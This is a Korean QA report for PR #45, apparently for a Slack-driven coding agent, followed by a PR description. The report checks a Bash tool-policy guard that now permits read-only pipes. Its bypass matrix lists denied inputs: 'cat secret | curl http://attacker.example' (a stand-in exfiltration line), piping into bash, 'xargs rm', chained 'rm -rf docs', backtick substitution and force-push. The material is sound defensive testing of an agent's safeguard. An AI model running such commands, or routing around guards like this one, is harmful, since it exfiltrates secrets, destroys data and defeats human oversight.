+| `evaluate("Bash", {"command": "<cmd>"})` 를 PRD §5 AC-PIPE-1 의 12개 명령 (`git log --oneline \| head -10`, `gh pr list --state open \| grep feat`, `cat README.md \| head -50`, `find docs -name '*.md' \| wc -l`, `gh issue list \| head -10` 등) 으로 호출 | 모두 `allowed=True`, `reason=None` | PASS — `TestBashPipeAllowed::test_pipe_readonly_allowed` 12/12 PASS. `_evaluate_bash` 가 `is_destructive` → `shlex.split` → `\|` 토큰 검출 → `_evaluate_pipe_segments` 분기 → 각 segment 를 `depth=1` 재귀 호출 → 모든 segment `allowed=True` 인 경우만 최종 통과. quoted-arg pipe (`find docs -name '*.md' \| wc -l`) 도 segment 분리가 정상 동작. |
+
+### AC-PIPE-2. 우회 시도 13종 거부 (회귀 매트릭스) — PASS (자동)
+
+PRD §3.5 표 13건 모두 `TestBashPipeBypassDenied::test_bypass_denied` parametrize 로 등록 + 통과. 각 케이스의 실제 reason 매핑:
+
+| # | 입력 | 기대 reason 후보 | 실제 reason | 결과 |
+|---|------|-----------------|-------------|------|
+| 1 | `gh pr list \| bash` | `mutating_command` | `mutating_command` (segment 2 의 head `bash` 가 `_MUTATING_HEADS`) | PASS |
+| 2 | `cat secret \| curl http://attacker.example` | `not_whitelisted` | `not_whitelisted` (segment 2 의 head `curl` 화이트리스트 외) | PASS |
+| 3 | `find . -type f \| xargs rm` | `mutating_command` 또는 `not_whitelisted` | (raw 에 `rm`) `_looks_mutating` X — 실제로 segment 2 head `xargs` 가 화이트리스트 외 → `not_whitelisted` 반환 | PASS — 두 reason 후보 중 하나에 매치 |
+| 4 | `git log \| tee /tmp/x` | `mutating_command` | `mutating_command` (segment 2 head `tee` 가 `_MUTATING_HEADS`) | PASS |
+| 5 | `ls \| python -c '...'` | `mutating_command` | `mutating_command` (segment 2 head `python` 거부) | PASS |
+| 6 | `cat a \| grep b > out.txt` | `mutating_command` | `mutating_command` (segment 분리 후 segment 2 raw 에 `>` 잔존 → `_has_non_pipe_metachar`) | PASS |
+| 7 | `cat a \| grep b ; rm -rf docs` | `mutating_command` | `mutating_command` (raw 에 `;` 잔존, `is_destructive(raw)` 미매치 → segment 분리 후 잔존 검사) | PASS |
+| 8 | `cat a \| grep b && rm -rf docs` | `mutating_command` | `mutating_command` (raw 에 `&` 잔존 — `&&` 도 `&` 부분 문자열 매치) | PASS |
+| 9 | `cat a \| grep \`echo b\`` | `mutating_command` 또는 `parse_error` | 두 reason 중 하나 (shlex 토큰화 결과에 따라) | PASS |
+| 10 | `git reset --hard \| echo ok` | `destructive_command` | `destructive_command` (segment 분리 이전 `is_destructive` 1차 차단) | PASS |
+| 11 | `gh pr merge 25 \| cat` | `mutating_command` | `mutating_command` (segment 1 의 `gh pr merge` 가 `_MUTATING_GH_VERBS`) | PASS |
+| 12 | `cat a \|\| grep b` | `parse_error` 또는 `mutating_command` | `parse_error` (`\|\|` → `\|` 토큰 2개 → 빈 segment 발생 → fail-fast) | PASS |
+| 13 | 6 segment chain `cat a \| grep b \| head \| tail \| wc -l \| cat` | `parse_error` | `parse_error` (`_MAX_PIPE_SEGMENTS = 5` 초과) | PASS |
+
+### AC-PIPE-3. 기존 단일 명령 회귀 0건 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| 기존 `TestBashReadOnlyAllowed`, `TestBashMutatingDenied`, `TestBashDestructiveDenied` 의 모든 parametrize 케이스 (`git log --oneline`, `cat README.md`, `git commit`, `git push`, `rm -rf`, `cat a \| tee b` 등 약 50+건) | 변경 전과 동일 `allowed`/`reason` 반환 | PASS — `python3 -m pytest ai/tests/dev_relay/test_tool_policy.py` → **128 passed**. 단일 명령 흐름은 `\|` 토큰 0개 → 기존 `_looks_mutating` 1차 필터 + head 화이트리스트 흐름 그대로 (PRD §3.2 단계 3, 회귀 0건 보장). `cat a \| tee b` 케이스도 PRD §3.5 #4 와 동일하게 `mutating_command` 거부 유지 (segment 2 head `tee` mutating). |
+
+### AC-PIPE-4. segment 수 상한 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `cat a \| grep b \| head \| tail \| wc -l \| cat` (6 segment) | `allowed=False`, `reason=parse_error` | PASS — `TestBashPipeBoundary::test_six_segments_rejected` |
+| `cat a \| grep b \| head \| tail \| wc -l` (5 segment, 모두 RO) | `allowed=True` | PASS — `TestBashPipeBoundary::test_five_segments_allowed` |
+| `_MAX_PIPE_SEGMENTS` 모듈 상수 노출 | import 가능 + 값 5 | PASS — `python -c "from ai.dev_relay.tool_policy import _MAX_PIPE_SEGMENTS; print(_MAX_PIPE_SEGMENTS)"` → `5` (PRD §3.4 만족) |
+
+### AC-PIPE-5. 빈 segment / 토큰화 오류 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `cat a \|\| grep b` (`\|\|` → 빈 segment) | `parse_error` (또는 `mutating_command`) | PASS — `TestBashPipeBoundary::test_double_pipe_empty_segment` (실제 reason `parse_error`) |
+| `cat 'unclosed quote` (shlex ValueError) | `parse_error` | PASS — `TestBashPipeBoundary::test_unclosed_quote_parse_error` |
+| `\| cat README.md` (앞 빈 segment) | `parse_error` | PASS — `TestBashPipeBoundary::test_leading_pipe_empty_segment` |
+| `cat README.md \|` (뒤 빈 segment) | `parse_error` | PASS — `TestBashPipeBoundary::test_trailing_pipe_empty_segment` |
+| `cat 'a \| b'` (quoted pipe — shlex 가 단일 토큰으로) | 단일 명령 흐름 진입 후 `_looks_mutating` 의 `\|` 부분 문자열 매치 → `mutating_command` | PASS — `TestBashPipeBoundary::test_quoted_pipe_treated_as_single_token` (위험 7번 — quoted pipe 보수 정책 유지) |
+
+### AC-PIPE-6. destructive 1차 차단 우선순위 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `git reset --hard HEAD~5 \| echo ok` | `destructive_command` (segment 분리 **이전**) | PASS — `TestBashDestructiveDenied::test_destructive_patterns_denied[git reset --hard HEAD~5 \| echo ok]` + `TestNLPipeHookIntegration::test_sdk_destructive_pipe_call_blocked` |
+| `git push --force \| cat` | `destructive_command` | PASS — `TestBashDestructiveDenied::test_destructive_patterns_denied[git push --force \| cat]` |
+| 코드 흐름 검증 | `_evaluate_bash` 내 `is_destructive(raw)` 가 `shlex.split` 보다 위 (PRD §3.2 단계 1) | PASS — `tool_policy.py:218-222` 의 `is_destructive(raw)` 가드가 `shlex.split` 호출 (line 226) 보다 먼저 평가됨 (정적 read 확인) |
+
+### AC-PIPE-7. 다른 metachar 잔존 거부 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `cat a \| grep b > out.txt` | `mutating_command` | PASS — `TestBashPipeBoundary::test_other_metachars_residual_denied[cat a \| grep b > out.txt]` |
+| `cat a \| grep b ; rm c` | `mutating_command` | PASS — 같은 parametrize |
+| `cat a \| grep b && rm c` | `mutating_command` | PASS — 같은 parametrize |
+| `cat a \| grep \`echo b\`` | `mutating_command` 또는 `parse_error` | PASS — `TestBashPipeBypassDenied` 케이스 #9 (backtick 잔존) |
+
+`_FORBIDDEN_NON_PIPE_METACHARS = ('>', '>>', '<', '&', ';', '`', '$(')` 6종 (실제 7개 토큰; `>` 와 `>>` 는 부분 문자열 매치 동치) 이 segment 분리 후 `_has_non_pipe_metachar` 로 검사 — `tool_policy.py:339-347`.
+
+### AC-PIPE-8. 컴플라이언스 정적 검사 — PASS (자동)
+
+| 산출물 | 키워드 hit | 검증 |
+|--------|-----------|------|
+| PRD 본문 (`docs/prd/dev-relay-shell-pipe-allow.md`) | 0 | PASS — `test_compliance.py::test_prd_shell_pipe_allow_body_outside_code_is_clean` (코드 블록 / 백틱 인용 제외 후 `find_forbidden_keywords` → `[]`) |
+| `ai/dev_relay/tool_policy.py` (구현 파일) | 0 | PASS — `test_compliance.py::test_dev_relay_source_clean[tool_policy.py]` |
+| `ai/tests/dev_relay/test_tool_policy.py` (신규 테스트 케이스) | 0 | PASS — 추가 직접 스캔 (`find_forbidden_keywords` → `[]`). `test_compliance.py` 가 dev_relay 소스만 스캔하므로 ai/tests/dev_relay/* 테스트 파일은 스캔 대상 외 — QA 가 본 세션에서 보강 스캔 수행 |
+| PR #45 commits (`895a02b`, `d1f20d5`) 메시지 | 0 | PASS — 직접 스캔 (`git log -1 --pretty=format:"%s%n%b" <SHA>` → `find_forbidden_keywords` → `[]`) |
+| PR #45 title / body | 0 | PASS — `gh pr view 45 --json title,body` → `find_forbidden_keywords` → `[]` |
+
+`test_compliance.py` 의 신규 정적 검사가 본 PRD 산출물(PRD 본문) 을 자동 커버 — `PRD_SHELL_PIPE_ALLOW_PATH` 등록 + parametrize 추가 (`test_compliance.py:30-35`, `test_compliance.py:233-240`). dev_relay 소스 스캔은 기존 `_iter_dev_relay_source_files()` 가 자동으로 신규 변경분(`tool_policy.py`) 을 포함 — 별도 화이트리스트 보강 불필요.
+
+### AC-PIPE-9. NL 통합 회귀 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| SDK PreToolUse hook 시나리오: `evaluate("Bash", {"command": "gh pr list \| grep feat"})` | `allowed=True`, `reason=None` (가드 통과) | PASS — `TestNLPipeHookIntegration::test_sdk_pipe_call_passes_guard` |
+| `evaluate("Bash", {"command": "cat audit.jsonl \| tail -20"})` | `allowed=True`, `reason=None` | PASS — `TestNLPipeHookIntegration::test_sdk_audit_pipe_call_passes_guard` |
+| 회귀: `evaluate("Bash", {"command": "git reset --hard HEAD~5 \| echo done"})` | `allowed=False`, `reason=destructive_command` | PASS — `TestNLPipeHookIntegration::test_sdk_destructive_pipe_call_blocked` |
+| dev_relay 회귀 — `test_handle_command_nl.py`, `test_nl_agent.py`, `test_nl_classifier.py` 모두 통과 | 0 fail | PASS — `python3 -m pytest ai/tests/dev_relay/` → **480 passed** |
+
+본 PRD 의 호출 측(`agent_runner` 의 PreToolUse callback) 코드는 변경 없음 (PRD §3.6, 6.1) — `evaluate()` 시그니처 그대로이므로 NL 통합 경로는 자동으로 회귀 보호된다.
+
+---
+
+## 2. 외부 인터페이스 변경 0건 검증 (PRD §3.6)
+
+| 항목 | 변경 전 | 변경 후 | 결과 |
+|------|---------|---------|------|
+| `evaluate(tool_name, tool_input)` 시그니처 | `(str, dict) -> ToolDecision` | `(str, dict) -> ToolDecision` | 변경 없음 |
+| `ToolDecision` 필드 | `allowed`, `reason`, `brief` | `allowed`, `reason`, `brief` | 변경 없음 |
+| `ALLOWED_TOOLS` | `{Bash, Glob, Grep, Read, WebFetch}` | `{Bash, Glob, Grep, Read, WebFetch}` | 변경 없음 |
+| `DENIED_TOOLS` | `{Edit, NotebookEdit, Write}` | `{Edit, NotebookEdit, Write}` | 변경 없음 |
+| audit kind | `tool_call`, `tool_denied` | `tool_call`, `tool_denied` | 변경 없음 (신규 0건) |
+| `_FORBIDDEN_SHELL_METACHARS` 상수 | 7개 (`>`, `>>`, `<`, `\|`, `&`, `;`, `` ` ``, `$(`) | 7개 (동일, 그대로 유지) | 변경 없음 — `\|` 는 segment 분리 흐름이 호출 순서로 우선 처리 (PRD §3.6) |
+| reason 식별자 | `empty_command`, `destructive_command`, `mutating_command`, `parse_error`, `not_whitelisted`, `phase1_readonly`, `secret_pattern`, `domain_not_allowed` | 동일 | 변경 없음 (신규 0건, PRD §3.3) |
+| 신규 모듈 상수 | — | `_MAX_PIPE_SEGMENTS = 5`, `_FORBIDDEN_NON_PIPE_METACHARS` (private internal) | 외부 인터페이스 X (모듈 prefix `_`) |
+
+`_evaluate_bash` 의 internal `depth: int = 0` 매개변수는 default 값으로 호출 측 무영향 — `evaluate()` 진입점에서 `_evaluate_bash(command)` (default depth=0) 호출 그대로 (`tool_policy.py:419`).
+
+---
+
+## 3. 에지 케이스 / 위험 시나리오 (PRD §7)
+
+| 위험 | 시나리오 | 검증 |
+|------|----------|------|
+| 1. 새로운 우회 패턴 발견 | `|` 허용 후 SDK 가 §3.5 외 패턴으로 우회 | 1차 방어 §3.5 13건 매트릭스 (AC-PIPE-2) — PASS. 2차 방어는 머지 후 1~2주 audit 모니터링 (PRD §6.3, 사용자 본인 책임) |
+| 2. shlex.split escape 차이 | `cat 'a \| b' \| grep c` (quoted pipe) | shlex 가 quoted `\|` 를 단일 토큰으로 묶음 — `cat 'a \| b'` 단일 명령 흐름은 raw 에 `\|` 부분 문자열 매치 → `_looks_mutating` 거부 (`mutating_command`). `TestBashPipeBoundary::test_quoted_pipe_treated_as_single_token` 회귀. quoted pipe 가 segment 1 안에 들어간 진짜 pipe 케이스 (`cat 'a b' \| grep x`) 는 `TestBashPipeAllowed` 에 직접 케이스는 없으나 `find docs -name '*.md' \| wc -l` 로 quoted-arg + pipe 가 정상 통과함을 검증 |
+| 3. 2차 재귀 호출 비용 | segment 5 + depth 1 → worst case 6회 `_evaluate_bash` 호출 | depth 가드 (`tool_policy.py:234`) 로 fail-fast — depth >= 1 에서 다시 segment 분기 진입 시 `parse_error` 즉시 반환. `_MAX_PIPE_SEGMENTS = 5` 로 worst case bound. 단위 테스트 실행 시간 0.33s/128 케이스로 성능 영향 무시 가능 |
+| 4. is_destructive 와 segment 상호작용 | `git log \| git reset --hard` (raw 에 destructive 패턴) | `is_destructive(raw)` 가 부분 문자열 매치 → segment 분리 이전 차단. `TestBashDestructiveDenied::test_destructive_patterns_denied[git reset --hard HEAD~5 \| echo ok]` + `[git push --force \| cat]` 가 회귀 보장 (AC-PIPE-6) |
+| 5. tee 분류 회귀 | `cat a \| tee b` 거부 유지 (segment 2 head `tee` 가 `_MUTATING_HEADS`) | 기존 `TestBashMutatingDenied::test_mutating_commands_denied[cat a \| tee b]` 그대로 PASS — PRD §3.5 #4 와 동일 의도된 회귀 |
+| 6. NL 분기 외 경로 회귀 | dispatcher destructive 가드 / reviewer-merger 머지 경로 | 본 PRD 변경 영향 X — `tool_policy.py` 단일 파일 변경 (PRD §6.1). `test_dispatcher.py 35`, `test_reviewer.py 11`, `test_merger.py 27`, `test_failures.py 18` 모두 0 fail (전체 480 passed) |
+| 7. depth 무한 재귀 | 의도치 않은 `_evaluate_bash` → `_evaluate_pipe_segments` → `_evaluate_bash(depth=1)` 무한 루프 | depth 가드로 차단 — depth >= 1 에서 또 `\|` 토큰 만나면 `parse_error` (`tool_policy.py:233-236`). 정상 흐름에서는 segment 내부에 `\|` 토큰이 없으므로 depth=1 재귀 호출에서 segment 분기 진입 X |
+| 8. 빈 입력 / whitespace-only | `""`, `"   "` | `_evaluate_bash` 의 strip 후 빈 문자열 검사 → `empty_command` (변경 없음) |
+| 9. Bash 외 도구의 영향 | `Read`, `WebFetch`, `Glob`, `Grep`, `Edit`, `Write` | 본 PRD 변경 X — 기존 분기 그대로. `test_tool_policy.py::TestWebFetchDomain` 12건, `TestGlobGrepAllowed` 2건, `test_phase1_no_write_in_allowed`, `test_allowed_and_denied_disjoint` 모두 PASS |
+
+---
+
+## 4. 컴플라이언스 정적 검사 결과 (실측)
+
+```
+$ python3 -m pytest ai/tests/dev_relay/test_compliance.py -v --tb=short
+...
+ai/tests/dev_relay/test_compliance.py::test_prd_shell_pipe_allow_body_outside_code_is_clean PASSED  [ 59%]
+ai/tests/dev_relay/test_compliance.py::test_dev_relay_source_clean[tool_policy.py] PASSED          [ 96%]
+============================== 52 passed in 0.28s ==============================
+```
+
+추가 직접 스캔 (QA 보강):
+
+```
+$ python3 -c "
+from ai.coordinator._compliance import find_forbidden_keywords
+for p in [
+    'docs/prd/dev-relay-shell-pipe-allow.md',
+    'ai/dev_relay/tool_policy.py',
+    'ai/tests/dev_relay/test_tool_policy.py',
+]:
+    with open(p) as f:
+        print(p, '->', find_forbidden_keywords(f.read()))
+"
+docs/prd/dev-relay-shell-pipe-allow.md -> []
+ai/dev_relay/tool_policy.py -> []
+ai/tests/dev_relay/test_tool_policy.py -> []
+```
+
+PR #45 메타데이터 스캔:
+
+```
+$ gh pr view 45 --json title,body | python3 -c "..."
+PR title: feat(dev-relay): Bash 가드 pipe(|) 부분 허용 — segment 분리 + 재귀 검증
+PR title keyword hits: []
+PR body keyword hits: []
+```
+
+PR #45 commit 메시지 스캔:
+
+```
+$ git log -1 --pretty=format:"%s%n%b" 895a02b | <find_forbidden_keywords>
+895a02b hits: []
+
+$ git log -1 --pretty=format:"%s%n%b" d1f20d5 | <find_forbidden_keywords>
+d1f20d5 hits: []
+```
+
+> 비고: `test_compliance.py` 자체는 본 파일 docstring 명시대로 fixture 키워드를 의도적으로 포함 — `_iter_dev_relay_source_files()` 가 `ai/dev_relay/*.py` 만 스캔하고 `ai/tests/dev_relay/*` 테스트 파일은 스캔 대상 외이므로 영향 없음.
+
+---
+
+## 5. 자동 검증 실행 로그 (요약)
+
+```
+$ python3 -m pytest ai/tests/ --tb=short
+============================= 654 passed in 1.39s ==============================
+
+$ python3 -m pytest ai/tests/dev_relay/ --tb=short
+============================= 480 passed in 1.14s ==============================
+
+$ python3 -m pytest ai/tests/dev_relay/test_tool_policy.py -v --tb=short
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeAllowed::test_pipe_readonly_allowed[git log --oneline | head -10] PASSED
+... (12 cases)
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBypassDenied::test_bypass_denied[gh pr list | bash-expected_reasons0] PASSED
+... (13 cases)
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_five_segments_allowed PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_six_segments_rejected PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_leading_pipe_empty_segment PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_trailing_pipe_empty_segment PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_double_pipe_empty_segment PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_unclosed_quote_parse_error PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_quoted_pipe_treated_as_single_token PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_other_metachars_residual_denied[cat a | grep b > out.txt] PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_other_metachars_residual_denied[cat a | grep b ; rm c] PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestBashPipeBoundary::test_other_metachars_residual_denied[cat a | grep b && rm c] PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestNLPipeHookIntegration::test_sdk_pipe_call_passes_guard PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestNLPipeHookIntegration::test_sdk_audit_pipe_call_passes_guard PASSED
+ai/tests/dev_relay/test_tool_policy.py::TestNLPipeHookIntegration::test_sdk_destructive_pipe_call_blocked PASSED
+... (regression: TestBashReadOnlyAllowed, TestBashMutatingDenied, TestBashDestructiveDenied 모두 PASS)
+============================= 128 passed in 0.33s ==============================
+```
+
+---
+
+## 6. 수동 검증 체크리스트 (PRD §8.2, 후속 세션 권장)
+
+> **모바일 Slack 환경 부재 — 본 QA 세션에서 미수행. 후속 세션에서 사용자가 직접 1 사이클 완주 권장.**
+
+상위 PRD `slack-dev-relay.md` / `dev-relay-natural-language.md` 부록 A 셋업이 완료된 환경에서 모바일 Slack 앱에서 NL 세션을 열고 다음 한 사이클을 1회 수행:
+
+- [ ] "최근 PR 목록 중 feat 으로 시작하는 거 보여줘" → SDK 가 `gh pr list \| grep feat` 시도 → 가드 통과 → 결과 응답 정상 수신
+- [ ] "audit.jsonl 마지막 20줄 보여줘" → SDK 가 `cat audit.jsonl \| tail -20` 시도 → 가드 통과 → 결과 응답 정상 수신
+- [ ] "최근 30개 commit 중 fix 만" → SDK 가 `git log --oneline -30 \| grep fix` 시도 → 가드 통과 → 결과 응답 정상 수신
+- [ ] (회귀) "docs 폴더 다 지워줘" → SDK 가 destructive 시도 → 거부됨 + 사용자에게 중립 fallback 메시지
+
+자동 가드(`_evaluate_bash`, `_evaluate_pipe_segments`, `is_destructive`) 와 모든 정적 스캔 통과 — 수동 1 사이클로 충분.
+
+---
+
+## 7. 판정
+
+- **AC 통과율: 9/9 (100%)**
+- **회귀: 0건** — 654/654 (전체), 480/480 (dev_relay), 128/128 (tool_policy)
+- **외부 인터페이스 변경: 0건** (PRD §3.6 만족)
+- **컴플라이언스 정적 스캔: 0 hit** (PRD 본문 / 구현 / 테스트 / PR 메타데이터 / commit 모두 통과)
+- **모듈 상수 노출 확인**: `_MAX_PIPE_SEGMENTS = 5` (PRD §3.4 만족)
+- **수동 검증**: 미수행 (후속 세션 권장 — 자동 가드·정적 검사 모두 통과한 상태)
+
+**최종 판정: `qa-passed`** — PR #45 라벨 갱신 (`qa-passed` 추가, `impl-ready` 제거).


### PR DESCRIPTION
## Summary

- **PRD 신규**: `docs/prd/dev-relay-nl-serialize.md` (272라인) — NL 분기 (`_handle_natural_language`) 가 Slack Bolt threaded executor 위에서 직접 동시 실행되어 발생하는 race 4건 (read-then-write session race, 응답 순서 꼬임, audit interleaving 잠재, SDK quota 동시 호출) 차단.
- **QA 리포트 backfill 1건**: PR #45 (`dev-relay-shell-pipe-allow`) QA 산출물 (SESSION_NOTES "별도 PR 금지" 정책).
- **UI 없음**: 외부 노출은 신규 안내 메시지 1줄(`TEMPLATE_NL_BUSY`) 만. 외부 인터페이스 시그니처 변경 0건.

## 사용자 결정 = 옵션 C (process-wide mutex)

| 옵션 | 채택 사유 / 기각 사유 |
|---|---|
| A (큐 통합) | 코드 복잡도 큼, NL worker 분리 필요 — 기각 |
| B (thread_ts 별 lock) | 락 맵 lifecycle 비용, 1인 MVP UX 이득 작음, 다중 사용자 시점 어차피 재설계 — 기각 |
| **C (process-wide `threading.Lock`)** | structured(`max_workers=1`) 와 정책 통일, 락 1개, 테스트 단순. 1인 MVP 충분. 다중 사용자 시점 옵션 A/B 재설계 — **채택** |

## PRD 핵심 결정

| 항목 | 결정 |
|---|---|
| 메커니즘 | `threading.Lock` 1개, `acquire(blocking=False)`, `try/finally` release 강제 |
| busy 시 정책 | 즉시 `TEMPLATE_NL_BUSY` 1줄 안내 + 거절. NL 큐 미도입 |
| structured ↔ NL 상호 직렬화 | **비범위** — 별도 락 (AC-NLS-4 회귀로 보장) |
| 신규 audit kind | `nl_busy_rejected` 1줄 (`ts`, `kind`, `thread_ts`, `user_id_masked`) |
| 신규 메시지 상수 | `TEMPLATE_NL_BUSY` — 한국어 1줄, 컴플라이언스 0 hit |
| rate_limiter 협업 | rate_limiter 우선, lock 가드는 그 다음 (중복 발사 금지 — AC-NLS-5) |
| shutdown 보호 | 진행 중 1건 graceful + 새 진입 거절. watchdog 은 PR #37 재사용 |
| 외부 인터페이스 변경 | **없음** (시그니처·`JobQueue`·`AgentRunner`·기존 audit kind 모두 그대로) |
| 운영 모니터링 | 머지 후 1~2주 `nl_busy_rejected` 빈도 모니터링 → 옵션 A/B 재설계 입력 |

## 9개 AC

AC-NLS-1 (같은 thread 동시 두 NL 거절) · AC-NLS-2 (다른 thread 동시 두 NL 거절 — process-wide) · AC-NLS-3 (turn 종료 후 정상 처리) · AC-NLS-4 (structured 진행 중 NL 회귀 — 별도 락) · AC-NLS-5 (rate_limiter 우선, busy 중복 발사 금지) · AC-NLS-6 (audit `nl_busy_rejected` 1줄) · AC-NLS-7 (컴플라이언스 정적 검사) · AC-NLS-8 (회귀 0 fail) · AC-NLS-9 (shutdown graceful + 새 진입 거절)

## QA 리포트 backfill

SESSION_NOTES 정책: 직전 머지 PR 의 사후 QA 리포트는 "별도 PR 금지, 다음 세션 첫 PR 브랜치에 묻어 넣기".

- `docs/qa/dev-relay-shell-pipe-allow.md` — PR #45 QA (9/9 AC PASS, 654 tests pass)

## Test plan

본 PR 은 PRD 신설 + QA 리포트 backfill 의 docs-only PR. 코드 변경 없음.

- [ ] PRD 본문 사용자 검토 (옵션 C 결정 근거·9개 AC·8개 신규 테스트 클래스)
- [ ] PRD 컴플라이언스 가드 통과 (`grep -inE 'signal|trad(e|ing)|desk' docs/prd/dev-relay-nl-serialize.md` → 0 hit)
- [ ] QA 리포트가 PR #45 QA 통과 시점 산출물과 동일함을 PR diff 로 확인
- [ ] 후속: `pipeline dev-relay-nl-serialize from=impl` (UI 없으므로 design 스킵)

## 참고

- 트리거: PR #45 reviewer 권고 (NL 분기 race 가능성), SESSION_NOTES 2026-05-06 (오후) §"다음 세션 시작 포인트" 3번
- 상위 PRD: `docs/prd/dev-relay-natural-language.md`
- 사촌 PR: PR #43 (structured 분기 직렬화), PR #37 (`AgentRunner.shutdown(timeout)` watchdog)
- 변경 대상: `ai/dev_relay/main.py:417-509` (`_handle_natural_language`)